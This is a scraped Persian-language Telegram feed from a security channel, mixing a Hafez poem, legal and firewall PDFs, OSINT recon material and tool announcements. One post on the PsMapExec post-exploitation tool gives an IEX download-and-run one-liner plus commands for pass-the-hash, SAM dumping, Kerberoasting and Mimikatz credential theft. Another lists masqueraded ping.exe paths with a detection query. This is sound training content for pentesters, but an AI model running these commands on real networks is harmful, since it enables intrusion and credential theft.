Media is too big
VIEW IN TELEGRAM
در سالنامه ایرانی بیستم مهر ماه روز بزرگداشت رند شیراز(حافظ) است.
هرچند تابی نمانده و نه دلی...
بماند به یادگار...
شاید سال دیگر شادمانهتر دیدیماش
که بندی نبود، ستمی نبود، دلها خوش بودند
و جانها شاداب و ...
جان، بی جمال ِ جانان میل ِ جهان ندارد
هر کس که این ندارد، حقا که آن ندارد
با هیچکس نشانی زآن دلستان ندیدم
یا من خبر ندارم؛ یا او نشان ندارد
هر شبنمی در این ره صد بحر ِ آتشین است
دردا که این معما شرح و بیان ندارد
سرمنزل ِ فراغت نتوان زِ دست دادن
ای ساروان! فروکش! کاین رَه کران ندارد
چنگ ِ خمیده قامت میخوانَد ت به عشرت
بشنو! که پند ِ پیران هیچات زیان ندارد
ای دل! طریق ِ رندی از محتسب بیاموز
مست است و در حق ِ او کس این گمان ندارد
احوال ِ گنج ِ قارون -کایام داد بر باد-
در گوش ِ دل فروخوان؛ تا زَر نهان ندارد
گر خود، رقیب، شمع است؛ اَسرار از او بپوشان
کآن شوخ ِ سَربُریده، بند ِ زبان ندارد
کس در جهان ندارد یک بنده همچو حافظ
زیرا که: چون تو شاهی کس در جهان ندارد.
خوانش: فریدون فرحاندوز
روز بزرگداشت"رند شیرازی"
@TryHackBox
هرچند تابی نمانده و نه دلی...
بماند به یادگار...
شاید سال دیگر شادمانهتر دیدیماش
که بندی نبود، ستمی نبود، دلها خوش بودند
و جانها شاداب و ...
جان، بی جمال ِ جانان میل ِ جهان ندارد
هر کس که این ندارد، حقا که آن ندارد
با هیچکس نشانی زآن دلستان ندیدم
یا من خبر ندارم؛ یا او نشان ندارد
هر شبنمی در این ره صد بحر ِ آتشین است
دردا که این معما شرح و بیان ندارد
سرمنزل ِ فراغت نتوان زِ دست دادن
ای ساروان! فروکش! کاین رَه کران ندارد
چنگ ِ خمیده قامت میخوانَد ت به عشرت
بشنو! که پند ِ پیران هیچات زیان ندارد
ای دل! طریق ِ رندی از محتسب بیاموز
مست است و در حق ِ او کس این گمان ندارد
احوال ِ گنج ِ قارون -کایام داد بر باد-
در گوش ِ دل فروخوان؛ تا زَر نهان ندارد
گر خود، رقیب، شمع است؛ اَسرار از او بپوشان
کآن شوخ ِ سَربُریده، بند ِ زبان ندارد
کس در جهان ندارد یک بنده همچو حافظ
زیرا که: چون تو شاهی کس در جهان ندارد.
خوانش: فریدون فرحاندوز
روز بزرگداشت"رند شیرازی"
@TryHackBox
❤10
مقدمات فایروال.pdf
778.8 KB
✏️ مقاله تالیف شده
مقدمات فایروال
✍️نویسنده
@TryHackBox | The Chaos
#FireWall #Cybersecurity #Networking
مقدمات فایروال
✍️نویسنده
@TryHackBox | The Chaos
#FireWall #Cybersecurity #Networking
❤3🔥1
Recon-User-LinkedIn-Part1-THB-Team.pdf
1.1 MB
🔖 در این آموزش از تیم TryHackBox، به بررسی reconnaissance بر پایه LinkedIn میپردازیم. یاد میگیرید چطور ساختار سازمانی رو نقشهبرداری کنید، اهداف کلیدی رو شناسایی کنید و از ابزارهایی مثل theHarvester و Maltego برای جمعآوری اطلاعات عمومی استفاده کنید. مثالهای عملی، تمرینهای گامبهگام و چکلیست اخلاقی هم داخلش هست.
@TryHackBox | Github | YouTube | Group
#Recon #OSINT #Linkedin
@TryHackBox | Github | YouTube | Group
#Recon #OSINT #Linkedin
linkedin_results_template.csv
683 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
@TryHackBox
target_list_template.csv
723 B
این فایل مربوط به آموزش بالا میباشد .
@TryHackBox
@TryHackBox
❤5👍5❤🔥1
🔖 grype v0.100.0
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
راهاندازی:
https://github.com/anchore/grype
@TryHackBox
#grype #soft #golang
اسکنر آسیبپذیری برای containers و فایل سیستم ها
نصب:
curl -sSfL https://get.anchore.io/grype | sudo sh -s -b /usr/local/bin
راهاندازی:
grype scope all-layers
https://github.com/anchore/grype
@TryHackBox
#grype #soft #golang
قوانین سایبری در ایران و مجازات.pdf
831.3 KB
⚖ آشنایی با قوانین جرایم سایبری در ایران
💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت میکنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.
⭕ یه اشتباه کوچیک در دنیای سایبری میتونه به جرم بزرگ تبدیل بشه!
💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
💢 اگر در حوزه امنیت سایبری، تست نفوذ یا ردتیم فعالیت میکنی، حتما باید بدونی چه کارهایی جرم محسوب میشن و مجازاتشون چیه.
⭕ یه اشتباه کوچیک در دنیای سایبری میتونه به جرم بزرگ تبدیل بشه!
💢 قبل از هر تست نفوذ یا فعالیت فنی، قوانین سایبری ایران رو بشناس.
@TryHackBox
#قوانین_سایبری
👍4👎2🐳1
🔖 PsMapExec v0.9.0
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
ماژول های اضافی در LDAP:
روشها (پروتکل) فعلی که پشتیبانی میشوند:
ماژول های پیاده سازی شده:
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.
به روز رسانی
پشتیبانی از چند دامنه
بهبود عملکرد از طریق Proxifier / تونلهای SSH
امکان روشن/خاموش کردن RDP
ماژولهای جدید:
EventCreds
ماژول های اضافی در LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDenoscriptions
UserLogonRestrictions
UserPasswords
UserSIDs
روشها (پروتکل) فعلی که پشتیبانی میشوند:
RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast
ماژول های پیاده سازی شده:
Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایلها در دایرکتوریهای متداول
KerbDump — دامپ تیکتهای Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگآن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیادهسازی DCsync
SAM — دامپ SAM
https://viperone.gitbook.io/pentest-everything/psmapexec
@TryHackBox
#PowerShell #pentest #redteam #psmapexec
❤3👍3
Try Hack Box
🔖 PsMapExec v0.9.0 یک به روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد. به روز رسانی پشتیبانی از چند دامنه بهبود عملکرد از طریق Proxifier / تونلهای SSH امکان روشن/خاموش کردن RDP ماژولهای جدید: EventCreds…
اجرای ابزار از حافظه:
مثالها:
اجرای با کاربر جاری
با پسورد
با هش
با تیکت
دامپ فایل SAM
Kerberoasting
استفاده از ماژول ها
@TryHackBox
#pentest #powershell #psmapexec
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")مثالها:
اجرای با کاربر جاری
PsMapExec -Targets All -Method [Method]
با پسورد
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
با هش
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
با تیکت
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
دامپ فایل SAM
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
استفاده از ماژول ها
PsMapExec -Targets All -Method [Method] -Module [Module]
@TryHackBox
#pentest #powershell #psmapexec
❤7
قوانین سایبری بینالمللی.pdf
601.2 KB
⚖ آشنایی با قوانین سایبری در سطح بین و المللی
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
⭕ بدون شناخت قوانین جهانی امنیت سایبری، هر فعالیت فنی میتونه دردسرساز بشه!
⭕ این فایل شامل خلاصهای از مهمترین قوانین سایبری در اروپا، آمریکا و سایر کشورهاست.
💢 قوانین سایبری فقط مخصوص ایران نیست .
💢 این فایل یه نگاه جهانی داره به قانونهایی که درباره هک، داده، و امنیت سایبری تصویب شدن.
⭕ حتما بخون قبل از هر تست یا پروژه فنی
@TryHackBox
#قوانین_سایبری_بینالمللی #قوانین_سایبری
❤5👍1
Securelist
Mysterious Elephant APT: TTPs and tools
Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.
امروز برای اولین بار سراغ یک تکنیک کاربردی می ریم که برای شکار تهدید خیلی مفیده
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
@TryHackBox
Masquerading: Match Legitimate Resource Name or Location (T1036.005).
مثل همیشه، با یک مثال شروع میکنیم
https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/
C:\ProgramData\Intel\ping.exe
C:\Users\Public\ping.exe
همانطور که مشاهده میشود، مهاجمان فایلهای مخرب را شبیه ابزارِ معتبر ping جلوه دادهاند. چنین مواردی را میتوان مستند سازی کرد و هم برای تشخیص و هم برای شکار تهدید از آن ها استفاده کرد برای مثال:
event_type: "processcreatewin"
AND
proc_file_path: "ping.exe"
AND NOT
proc_file_path: ("windows\system32" OR "windows\syswow64")
@TryHackBox
#سوال
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند :
بزرگترین نقطه قوت شما چیست؟
جواب هاتون کامنت کنید
❤6👏2
Try Hack Box
#سوال دوستان فکر کنید در یک مصاحبه هستید و ازتون سوال میپرسند : بزرگترین نقطه قوت شما چیست؟ جواب هاتون کامنت کنید
دوستان بات عضویت اجباری برداشته شد راحت میتونید بحث کنید.
نگاهی به پست های قبل :
راهنمای جامع تزریق پروسس در لینوکس
آزمایش آسیبپذیری آپاچی
چک لیست برای تست نفوذ اندروید
Credential Dumping DCSync Attack
جلسه هفتم دوره رایگان سکوریتی پلاس
واژهنامه امنیت سایبری TryHackBox
Browser Extensions For Bug Bounty
NTLM Relay Attack ?
Secure and insecure ports
PASSWORD CRACKING TOOLS
تزریق پرامپت Exploiting از سردرگمی دستورات LLM
ماه آگاهیبخشی امنیت سایبری
بیایید بیشتر در مورد APT و ..
SDDL | اشکهاتو برای یه روز دیگه نگه دار
بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده
در برخی موارد، مهاجمان ...
دیکشنری های پسورد
تست فایلهای JavaScript در حوزه باگ بانتی
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
بازی رمز عبور
فایروال دیوار دفاعی شبکه
مقدمات فایروال
بررسی reconnaissance بر پایه LinkedIn
آشنایی با قوانین جرایم سایبری در ایران
آشنایی با قوانین سایبری در سطح بین و المللی
راهنمای جامع تزریق پروسس در لینوکس
آزمایش آسیبپذیری آپاچی
چک لیست برای تست نفوذ اندروید
Credential Dumping DCSync Attack
جلسه هفتم دوره رایگان سکوریتی پلاس
واژهنامه امنیت سایبری TryHackBox
Browser Extensions For Bug Bounty
NTLM Relay Attack ?
Secure and insecure ports
PASSWORD CRACKING TOOLS
تزریق پرامپت Exploiting از سردرگمی دستورات LLM
ماه آگاهیبخشی امنیت سایبری
بیایید بیشتر در مورد APT و ..
SDDL | اشکهاتو برای یه روز دیگه نگه دار
بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده
در برخی موارد، مهاجمان ...
دیکشنری های پسورد
تست فایلهای JavaScript در حوزه باگ بانتی
ریورس و تحلیل امنیتی سیستم خانه هوشمند مبتنی بر ESP32
بازی رمز عبور
فایروال دیوار دفاعی شبکه
مقدمات فایروال
بررسی reconnaissance بر پایه LinkedIn
آشنایی با قوانین جرایم سایبری در ایران
آشنایی با قوانین سایبری در سطح بین و المللی
🔖 شاخص منابع شناخته شده
ابزاری آنلاین برای اسکن یک وبسایت و پیدا کردن اطلاعات درباره آن:
و دیگر موارد.
https://well-known.dev/
@TryHackBox
ابزاری آنلاین برای اسکن یک وبسایت و پیدا کردن اطلاعات درباره آن:
- robots.txt file
- security.txt
- ads.txt
- assetlinks.json
- app-ads.txt
- gpc.json
و دیگر موارد.
https://well-known.dev/
@TryHackBox
❤7
🛡 راهنمای نهایی تست امنیت وب (WSTG)
📚 معرفی یک مرجع بینظیر برای متخصصان امنیت:
Web Security Testing Guide (WSTG)
جامعترین راهنمای تست امنیت برنامههای تحت وب
✨ مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متنباز
- بهروزرسانی: نسخه اخیر (v4.2)
🎯 چه چیزی داخلش پیدا میکنید:
✅ تست احراز هویت و مدیریت نشست
✅ تست کنترل دسترسی
✅ تست تزریق (SQLi, XSS, Command Injection)
✅ تست منطق کسبوکار
✅ تست امنیت API
✅ و دهها فصل تخصصی دیگر...
🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی
✍️نویسنده
@TryHackBox | The Chaos
#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
📚 معرفی یک مرجع بینظیر برای متخصصان امنیت:
Web Security Testing Guide (WSTG)
جامعترین راهنمای تست امنیت برنامههای تحت وب
✨ مشخصات کتاب:
- ناشر: OWASP Foundation 🏢
- سازمان منتشرکننده: Open Web Application Security Project
- نوع محتوا: راهنمای رایگان و متنباز
- بهروزرسانی: نسخه اخیر (v4.2)
🎯 چه چیزی داخلش پیدا میکنید:
✅ تست احراز هویت و مدیریت نشست
✅ تست کنترل دسترسی
✅ تست تزریق (SQLi, XSS, Command Injection)
✅ تست منطق کسبوکار
✅ تست امنیت API
✅ و دهها فصل تخصصی دیگر...
🚀 چرا WSTG رو دانلود کنم؟
- منبع رسمی OWASP معتبرترین مرجع جهانی
- پوشش کامل چرخه تست امنیتی
✍️نویسنده
@TryHackBox | The Chaos
#WSTG #WebSecurity #OWASP #SecurityTesting
#CyberSecurity
❤6👍3🤔2
hidden links.pdf
6.8 MB
🔖 لینک های پنهان: تحلیل خانواده های مخفی اپلیکیشن های VPN .
💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشنهای VPN را که ارائه دهندگان آنها به عمد مالکیت خود را پنهان میکنند، تحلیل میکنیم. ما از روابط پنهان بین ارائه دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده میکنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن های ارائه دهندگان فریبنده هستیم تا نقص های مشترک را کشف کنیم.
@TryHackBox | Github | YouTube | Group
💠 در این مقاله، ما حریم خصوصی و امنیت اپلیکیشنهای VPN را که ارائه دهندگان آنها به عمد مالکیت خود را پنهان میکنند، تحلیل میکنیم. ما از روابط پنهان بین ارائه دهندگان VPN که به ظاهر متمایز هستند، به عنوان یک نشانگر غیرمستقیم از رفتار فریبنده استفاده میکنیم. سپس به دنبال مسائل امنیتی خاص VPN در اپلیکیشن های ارائه دهندگان فریبنده هستیم تا نقص های مشترک را کشف کنیم.
@TryHackBox | Github | YouTube | Group
👍10